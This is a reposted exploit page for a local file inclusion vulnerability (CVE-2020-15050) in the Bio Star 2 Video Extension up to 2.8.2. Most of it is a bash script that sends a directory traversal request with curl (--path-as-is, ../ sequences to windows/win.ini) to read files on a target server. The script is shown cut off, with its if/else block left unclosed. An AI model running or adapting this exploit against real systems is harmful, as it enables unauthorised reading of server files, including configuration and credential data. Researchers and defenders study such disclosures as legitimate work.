Home Bio Star 2.8.2
Post
Cancel

Bio Star 2.8.2

There is a local file inclusion vulnerability present in Bio Star version 2.8.2.

1
MD5 | 27371df2c5b87c59458e1241e0ee2306
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
    # Exploit Title: Bio Star 2.8.2 - Local File Inclusion
    # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
    # Google Dork: N/A
    # Date of Exploit Release: 2020-07-13
    # Exploit Author: SITE Team
    # Vendor Homepage: https://www.supremainc.com/en/main.asp
    # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
    # Version: Bio Star 2, Video Extension up to version 2.8.2
    # Tested on: Windows
    # CVE : CVE-2020-15050
    
    
    #!/bin/bash
    
    # Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit
    # Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi)
    # Google Dork: N/A
    # Date of Exploit Release: 13/7/2020
    # Exploit Author: SITE Team
    # Vendor Homepage: https://www.supremainc.com/en/main.asp
    # Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp
    # Version: Bio Star 2, Video Extension up to version 2.8.1
    # Tested on: Windows
    # CVE : CVE-2020-15050
    
    echo "*********** SITE TEAM *********************"
    echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********"
    echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi  *********************"
    
     if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini"
    echo "*******************************************"
    else
    args=("$@")
    curl -X GET --path-as-is -k  ${args[0]}${args[1]}


Source :   https://packetstormsecurity.com

This post is licensed under CC BY 4.0 by the author.